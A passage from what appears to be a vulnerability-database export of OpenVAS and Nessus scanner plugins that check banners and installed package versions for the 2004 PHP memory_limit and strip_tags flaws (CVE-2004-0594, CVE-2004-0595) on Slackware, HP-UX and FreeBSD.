$\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and -current\nto fix security issues (memory_limit handling and a problem in the strip_tags\nfunction). Sites using PHP should upgrade.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-202-01\";\n \nif(description)\n{\n script_id(53923);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-202-01 PHP \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-08T11:44:13", "bulletinFamily": "scanner", "description": "The remote host is running a version of PHP 4.3 which is older or equal to \n4.3.7.\n\nPHP is a scripting language which acts as a module for Apache or as a standalone\ninterpreter. There is a bug in the remote version of this software which may\nallow an attacker to execute arbitrary code on the remote host if the option\nmemory_limit is set. Another bug in the function strip_tags() may allow\nan attacker to bypass content-restrictions when submitting data and may\nlead to cross-site-scripting issues.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=13650", "id": "OPENVAS:13650", "title": "php < 4.3.8", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: php_strip_tags_memory_limit_vuln.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: php < 4.3.8\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote host is running a version of PHP 4.3 which is older or equal to \n4.3.7.\n\nPHP is a scripting language which acts as a module for Apache or as a standalone\ninterpreter. There is a bug in the remote version of this software which may\nallow an attacker to execute arbitrary code on the remote host if the option\nmemory_limit is set. Another bug in the function strip_tags() may allow\nan attacker to bypass content-restrictions when submitting data and may\nlead to cross-site-scripting issues.\";\n\ntag_solution = \"Upgrade to PHP 4.3.8\";\n\n# ref: Stefan Esser \n\nif(description)\n{\n script_id(13650);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10724, 10725);\n script_cve_id(\"CVE-2004-0594\",\"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n name = \"php < 4.3.8\";\n script_xref(name:\"OSVDB\", value:\"7870\");\n script_xref(name:\"OSVDB\", value:\"7871\");\n\n script_name(name);\n\n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n \n \n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"PHP/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\nphp = get_http_banner(port:port);\nif(!php)exit(0);\n\nif(ereg(pattern:\"PHP/4\\.3\\.[0-7][^0-9]\", string:php))\n security_message(port);\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053923", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053923", "title": "Slackware Advisory SSA:2004-202-01 PHP", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_202_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53923\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0594\", \"CVE-2004-0595\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-202-01 PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-202-01\");\n\n script_tag(name:\"insight\", value:\"New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and -current\nto fix security issues (memory_limit handling and a problem in the strip_tags\nfunction). Sites using PHP should upgrade.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-202-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"4.3.8-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:56:40", "bulletinFamily": "scanner", "description": "Check for the Version of Apache", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835148", "id": "OPENVAS:835148", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_id(835148);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:13", "bulletinFamily": "scanner", "description": "Check for the Version of Apache", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835148", "id": "OPENVAS:1361412562310835148", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835148\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01064\");\n script_cve_id(\"CVE-2004-0493\", \"CVE-2004-0488\", \"CVE-2004-0594\", \"CVE-2004-0595\");\n script_name( \"HP-UX Update for Apache HPSBUX01064\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.50.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52372", "id": "OPENVAS:52372", "title": "php -- memory_limit related vulnerability", "type": "openvas", "sourceData": "#\n#VID dd7aa4f1-102f-11d9-8a8a-000c41e2cdad\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n mod_php4-twig\n php4\n php4-cgi\n php4-cli\n php4-dtc\n php4-horde\n php4-nms\n mod_php4\n php5\n php5-cgi\n php5-cli\n mod_php5\n\nCVE-2004-0594\nThe memory_limit functionality in PHP 4.x up to 4.3.7, and 5.x up to\n5.0.0RC3, under certain conditions such as when register_globals is\nenabled, allows remote attackers to execute arbitrary code by\ntriggering a memory_limit abort during execution of the zend_hash_init\nfunction and overwriting a HashTable destructor pointer before\nthe initialization of key data structures is complete.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.e-matters.de/advisories/112004.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=108981780109154\nhttp://www.vuxml.org/freebsd/dd7aa4f1-102f-11d9-8a8a-000c41e2cdad.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52372);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0594\");\n script_bugtraq_id(10725);\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"php -- memory_limit related vulnerability\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mod_php4-twig\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package mod_php4-twig version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-dtc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-dtc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-horde\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-horde version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php4-nms\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3\")<=0) {\n txt += 'Package php4-nms version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php4\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.3.7_3,1\")<=0) {\n txt += 'Package mod_php4 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cgi\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5-cgi version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-cli\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2\")<=0) {\n txt += 'Package php5-cli version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mod_php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0.0.r3_2,1\")<=0) {\n txt += 'Package mod_php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T08:52:24", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 4.3.x installed on the\nremote host is prior to 4.3.7. It is, therefore, potentially\naffected by a bug that could allow an attacker to execute arbitrary\ncode on the remote host if the option memory_limit is set. Another\nbug in the function strip_tags() may allow an attacker to bypass\ncontent restrictions when submitting data and may lead to cross-site \nscripting issues.", "modified": "2019-12-02T00:00:00", "id": "PHP_STRIP_TAGS_MEMORY_LIMIT_VULN.NASL", "href": "https://www.tenable.com/plugins/nessus/13650", "published": "2004-07-15T00:00:00", "title": "PHP < 4.3.8 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(13650);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2004-0594\",\"CVE-2004-0595\");\n script_bugtraq_id(10724, 10725);\n\n script_name(english:\"PHP < 4.3.8 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 4.3.x installed on the\nremote host is prior to 4.3.7. It is, therefore, potentially\naffected by a bug that could allow an attacker to execute arbitrary\ncode on the remote host if the option memory_limit is set. Another\nbug in the function strip_tags() may allow an attacker to bypass\ncontent restrictions when submitting data and may lead to cross-site \nscripting issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/4_3_8.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP 4.3.8.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n \n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : 